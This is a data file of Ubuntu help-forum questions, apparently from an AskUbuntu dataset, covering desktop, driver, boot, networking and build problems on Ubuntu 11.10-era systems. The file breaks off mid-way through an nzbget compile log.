111694	desktop windows frozen after installing gnome-shell 3.2 in ubuntu 11.10 oneric ocelot	i 've recently performed a clean install of oneric ocelot from live cd ( after formatting my hard-disk and creating new partitions ) . one of the new things i decided to install was the gnome-shell and gnome-tweak-tool , since i wanted much more control than what the unity offered . so , i installed both gnome-shell and gnome-tweak-tool by using apt-get install . however , i 'm facing two issues while logging in to my new gnome 3.2 shell : [ 1 . ] the top-panel and bottom status-panel have both disappeared . ( screen-1 ) [ 2 . ] when i open a window , it becomes frozen i.e . it can not be moved or resized - and does not have a close/minimize button . ( screen-2 ) also , this does not happen when i login using the `` gnome classic '' or `` gnome classic ( no effects ) '' shell . one more issue is that the extensions list is empty in the gnome-tweak-tool though i have installed all the extensions , but that is another one to solve once this first obstacle is over . hope you can illuminate me in this regards ! cheers , prahlad .
111695	wireless not enabled at start up on lenovo x121e with xubuntu	my wireless works fine when it is enabled . but it needs to be enabled at every startup , rather than just being automatically enabled from the beginning of the session . i 'm running a lenovo x121e , and have installed xubuntu 11.10 onto it . any ideas on how to make it so it starts as enabled automatically ?
111697	wine prevents my system from booting	i installed wine windows program loader in my system having ubuntu 11.04 . i also played certain games with it 's help . the next day when i tried to log into my system i found that my system is struggling to boot . it took almost 20 minutes to get my login screen . also after typing my password i waited for 10 more minutes for it . i was only able to see the mouse pointer and nothing else . now i am using it temporarily with a live usb . i would like to uninstall wine . it is also that i installed wine from ubuntu software center . can anyone suggest me a way out of this ?
111698	how to allow write access ( create/write files ) to a directory but prevent delete ( to all , including owner )	i want to allow any write access to directory but prevent anyone ( aside from root ? ) from deleting the files once they are written . is there a permissions system that would allow for this ? there is no time to modify permissions between write and delete time .
111705	compatibility of toshiba satellite l855/l875 with intel/amd hybrid graphics ?	has anyone tested the linux compatibility for the new toshiba satellite l855/l875 laptops with intel/amd hybrid graphics ? are the proprietary ati drivers working ? is bumblebee working for them ?
111706	ubuntu-server upgraded to ubuntu desktop , how do i change it back ?	i decided to upgrade my home server to ubuntu 11.10 from 10.04 . instead of upgrading to the server version , it upgraded to the desktop version , or something similar to it . i assume this is because i had gnome installed to manage certain features through vnc ( linux noob here ) . so how do i get it to stop booting to the desktop and get rid of all the additional gui stuff it installed with the upgrade ?
111708	multi-screen and nvidia gt220	excuse me first for my broken english i have 3 monitors on two nvidia gt220 . unity 2d works fine after using the proprietary drivers . but no way to use compiz effects . i 'm on ubuntu 11.10 ( i also tested for curiosity 12.04 for the same result ) i noticed in the `` system settings '' / `` details '' that my graphics card is not recognized ( graphics card `` unknown '' ) and `` view '' only returns me my first screen ( with the correct resolution ) also in unknown . $ lspci | grep vga 01:00.0 vga compatible controller : nvidia corporation gt216 [ geforce gt 220 ] ( rev a2 ) 05:00.0 vga compatible controller : nvidia corporation gt216 [ geforce gt 220 ] ( rev a2 ) xorg.conf : section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' below `` screen0 '' screen 2 `` screen2 '' rightof `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 1 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` acer v243hl '' horizsync 30.0 - 80.0 vertrefresh 55.0 - 75.0 option `` dpms '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor1 '' vendorname `` unknown '' modelname `` lg electronics l1920p '' horizsync 30.0 - 83.0 vertrefresh 56.0 - 75.0 option `` dpms '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor2 '' vendorname `` unknown '' modelname `` acer v243hl '' horizsync 30.0 - 80.0 vertrefresh 55.0 - 75.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 220 '' busid `` pci:1:0:0 '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 220 '' busid `` pci:5:0:0 '' screen 0 endsection section `` device '' identifier `` device2 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 220 '' busid `` pci:5:0:0 '' screen 1 endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` twinviewxineramainfoorder '' `` dfp-0 '' option `` metamodes '' `` 1920x1080_60_0 +0+0 ; nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` crt : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen2 '' device `` device2 '' monitor `` monitor2 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` dfp : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` extensions '' option `` composite '' `` disable '' endsection have you any idea ? thanks
111710	recordmydesktop versus xvidcap and an importing problem	i have both recordmydesktop and xvidcap installed . i also have openshot and pitivi installed . openshot crashes more than pitivi , and has more features , but pitivi has a far better interface . but the lack of features means that i have to deal with openshot 's unreliability . if i capture my desktop with recordmydesktop , then the resulting video plays fine in the video player . however , once imported into openshot , the video is pixelated ( even when rendered as an exported video ) . ironically , when importing the same captured video into pitivi , everything works well and as it should . if i capture my desktop with xvidcap ( which is n't as friendly as recordmydesktop ) , then everything works fine in openshot ( and pitivi ) . what i do know is that recordmydesktop saves files as ogg while xvidcap saves files as mpeg . but should that make a difference when using openshot and pitivi ? ( i have all the restricted extras and gstreamer stuff installed , for example . ) recordmydesktop ( and ogg files ) are preferable to xvidcap . any idea what 's going on here ? edit : correction . recordmydesktop seems to create ogv files .
111715	how do i setup ethernet-only ssh ?	on my pair of ubuntu systems , a 3 mb file transfer via nautilus 2.32 over ssh takes about 15 seconds between two computers with identical wireless cards 2 meters apart . larger files take significantly longer , so the 15 seconds is not dominated by handshaking . this data rate seems unsatisfactory and obviously it would get worse if i were concurrently using the wireless cards for internet access . i have a 20 meter ( about 65 feet ) ethernet cable , coiled down to 2 meters , between the two computers but that physical medium is probably not being used for ssh because when i disable wireless , each nautilus can not see the other machine . how do i setup ssh for the ethernet cable exclusively ?
111716	can unity and gnome shell apps run on lxde ?	i am currently using gnome shell , unity and gnome classic on ubuntu 11.10 . i would like to know if i download lxde , would the gtk applications that i have on gnome 3.2 ( which is being used by unity and gnome shell ) be able to be used in lxde , or do i have to install separate software that can only be used by lxde ? because the apps i install on unity shell can also be accessed and used on gnome shell ( i suppose this is because they are both running on gnome 3.2 which uses gtk+3 libraries ) can i find the same apps i install on gnome shell and unity on lxde ? here 's what i mean : i install gnome shell on ubuntu 11.10 . i am able to access the apps i installed on unity on gnome shell from the search bar . even the bookmarks i save on firefox in unity will also be saved in firefox in gnome shell . what i am asking is will it be the same situation where i do not have to install apps specifically for lxde ?
111725	are there keyboard shortcuts for opening/using the filter on the unity dash ?	are there any keyboard shortcuts for opening/using the filter on the unity dash ? this is in 11.10 in case that makes a difference . there 's nothing listed on the list of shortcuts question . using the search functionality is not good enough as ( for example ) not all games show up if you type `` games '' into the search box .
111727	how do i get prompted for a hostname in a preseed ?	i want my automated install to ask me for a hostname . this is my preseed file and this is my pxe startup conf label auto64-1110 menu label ^c ubuntu 11.10 64-bit auto install met proxy kernel ubuntu-installer-1110/amd64/linux append vga=normal initrd=ubuntu-installer-1110/amd64/initrd.gz ramdisk_size=16417 root=/dev/ram rw preseed/url=http : //pxe-int.hobby.nl/auto-install-ubuntu-hobbynet.txt locale=en_us setup/layoutcode=en_us console-setup/layoutcode=en interface=eth1 netcfg/dhcp_timeout=60 netcfg/get_hostname=install keyboard-configuration/layoutcode=us -- what am i doing wrong ?
111732	linux os does not reset	i have noticed this in every linux os i have tried . when i attempt to a reboot , it hangs and forces me to manually shut it off . i cant imagine that this is good for my netbook and was wondering if this can be changed . i have tried mint 12 & 9 , ubuntu 11 , and xubuntu and they all do this .
111736	how do you remove the xubuntu 11 toolbar at the bottom of the screen ?	i want to replace it with a toolbar that resembles the mac os ... ca n't remember what it is called but it has nice effects .
111737	use inotify to watch a folder for a long time	i want to use inotify to monitor a folder on my home folder for a long period time.can inotify be used this way or do i need some kind of a server for this particular purpose .
111742	how to recover my win7 on ubuntu grub ?	help me ... i have installed ubuntu 11.10 above win7 , unfortunately after finish installation and restart the grub did n't appear , i look out in grub menu and win7 was n't exist , i try to repair with win7 installation but win7 installation was n't detect the win7 , , how to recover my win7 ?
111744	how to install custom c library ?	i just wanted to add a c library to ubuntu which was created by harvard university for cs50 course . they provided instructions for how to install the library which is listed below . debian , ubuntu first become root , as with : sudo su - then install the cs50 library as follows : apt-get install gcc wget http : //mirror.cs50.net/library/c/cs50-library-c-3.1.zip unzip cs50-library-c-3.1.zip rm -f cs50-library-c-3.1.zip cd cs50-library-c-3.1 gcc -c -ggdb -std=c99 cs50.c -o cs50.o ar rcs libcs50.a cs50.o chmod 0644 cs50.h libcs50.a mkdir -p /usr/local/include chmod 0755 /usr/local/include mv -f cs50.h /usr/local/include mkdir -p /usr/local/lib chmod 0755 /usr/local/lib mv -f libcs50.a /usr/local/lib cd .. rm -rf cs50-library-c-3.1 i did exactly as directed . but the compiler reported “undefined reference to a function” -- the function was get string . so , i searched for a solution and found one . it said to use the -l switch . now when i compile i use something like : gcc –o hello.c hello –lcs50 ( i don’t remember the exact command . ) however , i can not use the make command , which is easier to use . i understand that there is some problem with linking the library . what is a good solution to this problem ?
111747	environment variables	i want to ask newbie question about environment variables in ubuntu i 'm trying to configure maven3 using /etc/environment . i installed maven manually i.e . unpacked , moved to /opt/maven . my /etc/environment file java_home= '' /opt/java/jdk1.6.0_31 '' jre_home= '' /opt/java/jdk1.6.0_31/jre '' maven_home= '' /opt/maven '' path= '' /usr/local/sbin : /usr/local/bin : /usr/bin : /sbin : /bin : /usr/games : $ java_home : $ jre_home : $ maven_home/bin '' when i replace in path $ maven_home with /opt/maven everything works . if i revert changes - > maven is not installed . why ? i check maven after logout/login .
111749	why does unity 2d start when i choose the `` gnome/openbox '' session ?	i have ubuntu 11.10 with unity 2d and gnome shell , and i have also installed the openbox window manager . if i choose to start an `` openbox '' session , it works fine ( i.e . the openbox window manager starts ) , but if i choose the `` gnome/openbox '' session , then unity 2d starts . why does this happen and how can i solve it ?
111750	admin lost sudo permission in ui ?	i just set up ubuntu ( 11.10 ) and installed a lot of things . here and there i had to edit user permission ( s ) . now i have to find out that all ui buttons that would evoke the sudo password window are disabled in my administrator account . when i go `` guest '' everything is fine however . so i assume that i made some weird changes to the account settings of my administrator account . how can i revert this weird setting ? thanks audiodroid
111751	how do i correctly install r8169 network driver ?	my network driver drops out within a short time of logging on . the situation is explained more readily in the following forums thread which has not been replied to as yet . http : //ubuntuforums.org/showthread.php ? t=1937956 as i am not very computer literate , i would appreciate guidance about correctly installing the driver or alternatively point me in the right direction to assist me in providing a solution . i have looked at a number of posts in launchpad however these tend to confuse me . i hope that somebody is able to help me - thank you
111753	how many packages exist for each supported architecture ?	that 's it . how can i know how many i386 , arm64 , armhf , ppc64el and amd64 packages exit available in repos ?
111754	ubuntu 10.10 cd screen does n't appear , scrub does	i have a ubuntu 10.10 cd that start when inserted in a machine b ( windows ) when i insert it in machine a ( ubuntu 9 ) , it goes to grub and then start ubuntu 9 i have a ubuntu 9 cd . it starts on machine a and does not go to grub . i want to install my ubuntu 10.10 cd on machine a . is there an easy way to bypass grub like it seems to do with my ubuntu 9 cd . note that i want to re-install the machine from scratch .
111756	dual boot xp and ubuntu , ( xp installed first )	i tried to install ubuntu-10.04-desktop-i386 . while booting from live cd i checked gparted and details confused me . as i recently formatted my pc after moving all data to other internal hd , you can see all partitions are empty . now i have to install ubuntu on d partition . but i see a partition extended 172 gb which i actually do n't have . how should i proceed ? also , when i clicked on windows partitions they appeared on the desktop . is this mounting ? this is a continuation of the question .
111759	why does n't `unity -- reset` work ?	i want to reset unity . but when i type unity -- reset i get the following error : xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . compiz ( opengl ) - fatal : glxcreatecontext failed compiz ( bailer ) - info : ensuring a shell for your session ... i am not using compiz ! i am using metacity . thanks a lot : ) edit : i am using unity . and i want to reset it as the sidebar is always shown when i am viewing my desktop ( although it hides automatically if i am using other applications ) and alt+tab switches the windows in a different , poor way ( not the default one of ubuntu 11.10 ) .
111761	gnome3 extension collapse , how to solve it , or make gnome3 to default ?	i tried to install an extension ( auto hide top panel ) in extensions.gnome.org , but then it get something wrong and looks like this , look at the first one , obviously right , i 've tried reboot or re-install the extension , did n't help , so how to solve with this ? i 'm using 11.10 and gnome 3.2 .
111766	how to auto-start a program in a standalone session ?	i have made a new stand alone session like in this topic , but i want to auto-start dockbarx in only this session i follow this topic but it is auto-start in all gnome-fallback sessions , so what to do ? ? ?
111769	update problem using `` apt-get update ''	the command i gave was sudo apt-get update & & sudo apt-get upgrade what i have to do ? ( i 'm under kubuntu 11.10 )
111770	how reinstall apache2 ?	i have a problem in my apache2 : and i exec sudo aptitude purge apache2 , but in /etc/ the folder apache2 persist , after this , i move the apache2 to apacheold , and exec sudo aptitude install apache2 , and this has been installed the command `` apache2 '' but in the /etc/ , the folder apache2 is not exist
111773	how to play full screen video on second monitor ?	i have two identical monitors , and when playing a full screen video on one of them using the default player or vlc and then working on the other monitor - the top bar and the launcher appear above the video . how can i avoid that ? btw . i 'm using ubuntu 11.10 === this is the case in ubuntu 12.04 as well . i noticed it when connected to a tv via hdmi .
111779	is a 5 minute long live usb boot time normal ?	i 've just made a live usb stick with ubuntu 11.10 usb creator . i tried it on 2 laptops and the boot time is very long , more than 5 minutes . is it normal ? if it is , what is the interest of having a portable os if it take ages to boot ? with a 2gb memory stick , i reduced the persistent memory from 4 to 1gb and the boot time was faster , less than 2 minutes . i tried with an 8gb usb stick again with a persistent memory of 1gb , and the boot time is 4 minutes . it seems that the boot time is linked with the usb memory stick and persistent memory size . is that true ? will the boot time be faster with a `` class 8 '' usb memory stick ?
111784	can not restart samba	i installed samba sudo apt-get install samba . then i made configuration but when i write : sudo /etc/init.d/samba restart message appears `` command not found `` and when i write ls /etc/init.d i did n't find samba . solutions tested : sudo /etc/init.d/smbd restart sudo /etc/init.d/nmbd restart sudo service samba restart and re-install samba can you hint me please . note : my os is ubuntu10.4 lts
111793	desktop windows frozen and panels disappeared after installing gnome-shell 3.2	i 've recently performed a clean install of oneric ocelot from live cd ( after formatting my hard-disk and creating new partitions ) . one of the new things i decided to install was the gnome-shell and gnome-tweak-tool , since i wanted much more control than what the unity offered . so , i installed both gnome-shell and gnome-tweak-tool by using apt-get install . however , i 'm facing two issues while logging in to my new gnome 3.2 shell : [ 1 . ] the top-panel and bottom status-panel have both disappeared . ( screen-1 ) [ 2 . ] when i open a window , it becomes frozen i.e . it can not be moved or resized - and does not have a close/minimize button . ( screen-2 ) screen-1 : screen-2 : also , this does not happen when i login using the `` gnome classic '' or `` gnome classic ( no effects ) '' shell . one more issue is that the extensions list is empty in the gnome-tweak-tool though i have installed all the extensions , but that is another one to solve once this first obstacle is over . hope you can illuminate me in this regards !
111794	how can i improve the power usage of my home ubuntu server ?	so , i have a home ubuntu server , that i only use rarely , but sometimes use remotely . i would like to have it minimize the power usage , even if it requires a minute to access remotely , as i only use it a time or two per day really . how could i set my server to go into a sleep mode when not in use ?
111799	wine outputs short static sound	i 'm having issues with wine 1.4 in ubuntu 11.10 . to be honest , i do n't know if it ever worked on this hardware ( relatively new computer , had it for a few months ) , seeing as the wine app i use the most hardly uses sound , but now that i tried another app , it 's giving me problems . when i do an audio test in wine config , i get a short static sound . the selected driver appears to be winealsa.drv , do i need to change that and if so , how would i do that ? i have all the input and output devices set to default , i do n't think i have to change that . i also should n't have to restart alsa with sudo /sbin/alsa force-reload because it seems to work fine with my other applications ( unless that 's all on pulseaudio ? ) , but even when i do run that command to restart alsa , the test sound in wine config is still the same short static . i thought in the one application i just tried that uses sound a lot , sound plays but insanely fast , making it practically as useless as if sound did n't work at all . sound works perfectly from anything outside of wine . i think i 've found the problem , though . when i go in regedit to hkey_current_user/software/wine/ , there 's no drivers key , nor audio key . i created a drivers key and added an audio string with alsa as a value , did n't change anything . edit : if i set the value to anything else , wine config tells me the audio driver is unavailable . i 've tried searching for a solution , went through forums ( and i 'll keep searching ) , i briefly looked at the wine appsdb but i do n't think the problem is application-specific please help ! edit : getting the debs from this place ( from the launchpad bug ) tells me it has unmet dependencies , and if i try to install that dependency , synaptic tells me it has to remove a whole lot of packages ! not willing to do that .
111800	how to configure motherboard to allow suspension	my computer is unable to suspend/hibernate on ubuntu 11.10 . some people told me that probable had to do with my bios setting , that i should set my acpi settings to s3 . the problem is that i ca n't find that s3 thing anywhere . i have an asus p8p67 le motherboard . the only thing i think could be related is this on `` advanced- > apm : power on my ps/2 keyboard : disabled power on my ps/2 mouse : disabled restore ac power loss : power off power on my pci : disabled power on my pcie : disabled power on my ring : disabled power on my rtc : disabled can i get suspend with that ? how should i configure it ? edit : i explained in detail my problems in this other question ( which was closed ) fail to wake up after suspend , buggy after hibernate
111801	skype video call not working ubuntu 11.10	am having issue with skype 2.2 ( beta ) , wherein am not able to make video calls on ubuntu 11.10 64 bit . any solutions for having this issue fixed ?
111803	enable ecryptfs for all new users , even those authenticating through kerberos and ldap	how do i make sure that all users have their home directory encrypted when the login for the first time ? i have setup pam to use kerberos authentication and ldap authorization ( which i think should not really have any effect on ecryptfs ) . i have also setup pam-mkhomedir to create the home directories from /etc/skel in which i have placed some standard configurations . looking at the .ecryptfs directory in one user account that already has ecryptfs enabled , there are some user-specific configurations , such as the mountpoint ( set to /home/d_inevitable ) for example , which would be no good in /etc/skel . also the configurations in /etc/skel would need to be copied after the home directory has been mounted with ecryptfs .
111807	dell precision m4600 stuck at last stage of reboot	when rebooting the sequence freezes at the very last stage in which it attempts to the the system to reset through acpi . setting acpi=off in grub.cfg fixed this problem , but i was unable to suspend , which was the greater evil . shutdown and suspend work fine with acpi enabled . how can i get this fixed without disabling acpi ( or without being unable to suspend ) ?
111816	auto-mounting an encrypted usb hard drive	how can you configure a headless ubuntu server to auto-mount an encrypted usb hard drive ? i found this similar question , which explains how to mount the drive from the command line , but the author is unaware of how to automatically mount . however , nautilus provides this functionality , by asking the user whether or not they want to `` remember the password '' or `` forget the password immediately '' . if you choose to remember the password , then nautilus will auto-mount the encrypted drive from then on . what 's the equivalent functionality from the command line ? how do you configure ubuntu to remember the password and auto-mount the drive ?
111817	how can i remove the messaging menu in 11.10 ?	i never use it , never have and never will . so , like any unwanted , unnecessary or superfluous software on my computer i 'd like to remove it . i ca n't find an option for this anywhere , and i think there should be . how can i completely remove the menu , including the icon in the bar ? if it means removing the software , that 's fine too . i do not use messaging , chat , or ubuntu one . i have n't even got a clue what broadcast is !
111818	how to install a nvidia driver for 11.10	i have a thinkpad t61p with quadro fx570m . i just installed the ubuntu 11.10 . i have tried to download the driver linux display driver - x86 version 295.20 from nvidia , but i do not manage to install it . if i open system > screens , there is an unknovn screen driver . my installation works fine except , fails on resume with a black and white pattern all over the screen and i have difficulties detecting an external monitor . please , if you have any clue - help me out .
111819	multitouch not working on 11.10	i have a thinkpad edge 520 , installing drivers is n't possible because the site does n't support linux ... my multitouch was working on a previous version of ubuntu . on top of that i have a problem with my keyboard ( maybe also driver problem ? ) i ca n't press keys fast after each other ( or the same key , which is quite annoying ) . anybody have any suggestions ? xinput list : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=10 [ slave pointer ( 2 ) ] ⎜ ↳ tpps/2 ibm trackpoint id=11 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ integrated camera id=8 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=9 [ slave keyboard ( 3 ) ] ↳ thinkpad extra buttons id=12 [ slave keyboard ( 3 ) ]
111826	downgrade to 11.10	i 'm on 12.04 beta , and quite honestly , it 's too buggy for me . is there any way to downgrade to 11.10 ? i 've read some things on other forums about using older repos ; would this work ?
111827	has any one tried ati 12.2 proprietary display driver for ubuntu 11.10 64 bit ?	i have ati technologies inc mobility radeon hd 3400 series graphic card . was using open source drivers and are decent . hangs little bit sometimes but are fine most of the time recently , i have seen ati released 12.2 drivers . has any one tried them ? are they working fine ? can i try them ?
111830	how to install dkim-filter by apt-get ?	in tutorial , dkim is installed by sudo apt-get install dkim-filter i wonder why on my ubuntu 10.10 , i am unable to do this as i receive error of e : unable to locate package dkim-filter how can i install dkim by apt-get ?
111837	fail to start windows after ubuntu 11.10 install	computer : hp pavilion dv7-6140eo os : originally win7 i recently decided to try out ubuntu , and i decided to dual-boot it with windows 7 . first i googled some how-to 's , then i downloaded ubuntu onto a memory stick and made a second partition ( i originally only had one partition that i shrunk and used the unallocated space to install onto during the ubuntu install ) . during the install i set format type to xt4 ( or something , it was the default option ) , chose the `` in the beginning '' option and set the last option as `` \ '' . the install was successful . although , when i restarted my computer i were n't able to choose which operating system to start ; it went right into windows . after showing the windows logo for half a second before rebooting , i get a blue screen ( see bottom of the page ) . trying to fix it , i deleted the newly made partition i had just installed ubuntu onto ( seeing it was n't working either ) . this made no difference . i proceeded with installing ubuntu again , so i would at least have a functioning computer , and now ubuntu works fine ( on it now ) . the only difference on start-up is that i get a grub window asking me to between several options including linux and windows 7 ( loader ) . now , if i choose windows 7 , i get the message : windows was unable to start . a recent software or hardware change might be the cause.. it recommends me to choose the first option of the two it provides ; to start start-up repair tool . the second option being starting windows normally . if i start windows normally , the same thing happens as earlier . my computer does not have a windows installation cd . although , it has ( at least it used to , if i have n't screwed that too up ) a 17gb recovery partition . in addition i made an image of the computer onto a external hard drive when i first got it . though , i have no idea how to use either . if anyone has any idea how i can make windows work again or reinstall it ( already backed up my files ) it would be greatly appreciated . i still prefer to dual boot between the two functioning operating systems , but i will settle for a functioning windows 7 . thanks a lot for any replies . blue screen : a problem has been detected and windows has been shut down to prevent damage to your computer . if this is the first time you 've seen this stop error screen , restart your computer . if this screen appears again , follow these steps : check for viruses on your computer . remove and newly installed hard drives or hard drive controllers . check your hard drive to make sure it is properly configures and terminated . run cmkdsk /f to check for hard drive corruption , and then restart your computer . technical information : **stop : 0x0000007b ( 0xfffff880009a97e8,0xffffffffc0000034 , 0x0000000000000000,0x0000000000000000
111839	gimp wo n't run , and i ca n't uninstall and reinstall it	error ! bad return status for module build on kernel : 2.6.32-39-generic ( i686 ) consult the make . log in the build directory /var/lib/dkms/keucr//0.0.1/build/for more information . dpkg : error processing keur-dkms ( -- configure ) : subprocess installed post-installation script returned error exit status 10 setting up libabbal-0.0-0 ( 0.0.22-1build1 ) ... also when i click on gimp , a loading symbol comes up but nothing happens .
111840	ps1 problem , messing up cli	i did a simple ps1 assignment ps1= '' \e [ 0 ; 31m [ \w ] \ $ \e [ m `` all i wanted to do was to change the prompt color and display only the relative path . however this messes up the cli . for example , when browsing history with the â it crops and overlaps the display . when i type a long command the cursor moves to the beginning of the screen overlapping with the prompt display itself . what have i done wrong ?
111846	lineage 2 freya , doesnt run from wine	i start the game and i get to the login screen . however , all the text on the login screen is gone . could this be my video card ? shall install the video card driver using wine ? or is this directx ? do you guys think that i should install it using wine too ? thanks in advance .
111851	windows partition not recognized	using windows 7 64bit , installing ubuntu 11.04 64bit when trying to install ubuntu 11.04 on an existing windows installation i am not able to see my existing partitions not in the installation menu and not in gparted via live cd as well . sudo fdisk -l : disk /dev/sda : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xf5d517a7 device boot start end blocks id system /dev/sda1 1 13 102400 7 hpfs/ntfs partition 1 does not end on cylinder boundary . /dev/sda2 * 13 230453 1851010048 7 hpfs/ntfs /dev/sda3 230453 236828 51200000 7 hpfs/ntfs /dev/sda4 236828 243202 51200000 f w95 ext 'd ( lba ) /dev/sda5 236828 243202 51198976 7 hpfs/ntfs disk /dev/sdb : 15.8 gb , 15812526080 bytes 255 heads , 63 sectors/track , 1922 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x34dd3d50 device boot start end blocks id system /dev/sdb1 * 1 1923 15441888+ c w95 fat32 ( lba ) /dev/sdb2 1923 1923 31+ 21 unknown is this cause of hpfs ? how can i resolve it ? edit : sudo parted -l error : ca n't have a partition outside the disk ! i try using fixparts . there seems to be a bug report on this issue but no solution there as well .
111854	how to install lubuntu ?	i am having problem with the installation of lubuntu 11.10 . the problem is in section of `` select and install software . '' first it was struck at retrieving 636 of 636 and then when there was no progress i restarted the computer then it gave me the following message : please insert the disc labelled : 'lubuntu 11.10 _oneric ocelet_ - release i386 ( 20111011 ) ' in the drive '/media/cdrom ' and press enter . i had downloaded an iso image of the lubuntu 11.10-alternate ( 592mb ) and burned the iso image to the cd .
111857	how can i disable the minimize button ?	when i accidentally minimize windows in unity it 's so hard to find them i usually do n't even bother and just open a new one instead . how can i get rid of that terrible button so i do n't ever click it by accident again ?
111872	what is the set of any font in gnome-tweak-tool ?	i know that : default font-is just default document font-for documents window title fonts is for titles . what the others are for ? what is monospace font ? i only know it 's a font like any font . hinting is for notices like the names of objects in the dock , is n't it ?
111875	'make : *** [ tls.o ] error 1 ' while installing nzbget	i 'm trying to install nzbget on ubuntu 11.10 . here 's the output of ./configure checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking build system type ... x86_64-unknown-linux-gnu checking host system type ... x86_64-unknown-linux-gnu checking for g++ ... g++ checking for c++ compiler default output file name ... a.out checking whether the c++ compiler works ... yes checking whether we are cross compiling ... no checking for suffix of executables ... checking for suffix of object files ... o checking whether we are using the gnu c++ compiler ... yes checking whether g++ accepts -g ... yes checking for style of include used by make ... gnu checking dependency style of g++ ... gcc3 checking for tar ... /bin/tar checking for make ... /usr/bin/make checking for a bsd-compatible install ... /usr/bin/install -c checking how to run the c++ preprocessor ... g++ -e checking for grep that handles long lines and -e ... /bin/grep checking for egrep ... /bin/grep -e checking for ansi c header files ... yes checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking sys/prctl.h usability ... yes checking sys/prctl.h presence ... yes checking for sys/prctl.h ... yes checking for library containing pthread_create ... -lpthread checking for library containing socket ... none required checking for library containing inet_addr ... none required checking for library containing hstrerror ... none required checking for getopt_long ... yes checking for stat64 ... yes checking for ctime_r ... yes , and it takes 2 arguments checking for getaddrinfo ... yes checking for library containing getaddrinfo ... none required checking for type of socket length ( socklen_t ) ... socklen_t checking for pkg-config ... /usr/bin/pkg-config checking pkg-config is at least version 0.9.0 ... yes checking for libxml2 ... yes checking libxml/tree.h usability ... yes checking libxml/tree.h presence ... yes checking for libxml/tree.h ... yes checking for library containing xmlnewnode ... -lxml2 checking whether to use curses ... yes checking ncurses.h usability ... yes checking ncurses.h presence ... yes checking for ncurses.h ... yes checking for library containing refresh ... -lncurses checking whether to include code for par-checking ... yes checking for libsigc ... yes checking sigc++/type_traits.h usability ... yes checking sigc++/type_traits.h presence ... yes checking for sigc++/type_traits.h ... yes checking libpar2/libpar2.h usability ... yes checking libpar2/libpar2.h presence ... yes checking for libpar2/libpar2.h ... yes checking for library containing _zn12par2repairerc1ev ... -lpar2 checking for libpar2 linking ... yes checking whether libpar2 supports cancelling ... no checking whether to use tls/ssl ... yes checking gnutls/gnutls.h usability ... no checking gnutls/gnutls.h presence ... no checking for gnutls/gnutls.h ... no checking openssl/ssl.h usability ... yes checking openssl/ssl.h presence ... yes checking for openssl/ssl.h ... yes checking for library containing ssl_library_init ... -lssl checking whether to include all debugging code ... no configure : creating ./config.status config.status : creating makefile config.status : creating config.h config.status : executing depfiles commands here 's the output of make /usr/bin/make all-am make [ 1 ] : entering directory `/home/james/nzbget/nzbget-0.7.0' if g++ -dhave_config_h -i . -i . -i . -i/usr/include/libxml2 -i/usr/include -i/usr/include/sigc++-2.0 -i/usr/lib/sigc++-2.0/include -i/usr/include -i/usr/include -i/usr/include -g -o2 -mt articledownloader.o -md -mp -mf `` .deps/articledownloader.tpo '' -c -o articledownloader.o articledownloader.cpp ; \ then mv -f `` .deps/articledownloader.tpo '' `` .deps/articledownloader.po '' ; else rm -f `` .deps/articledownloader.tpo '' ; exit 1 ; fi articledownloader.cpp : in member function ‘void articledownloader : :completefileparts ( ) ’ : articledownloader.cpp:1032:160 : warning : format ‘ % i’ expects argument of type ‘int’ , but argument 4 has type ‘std : :vector < articleinfo* > : :size_type { aka long unsigned 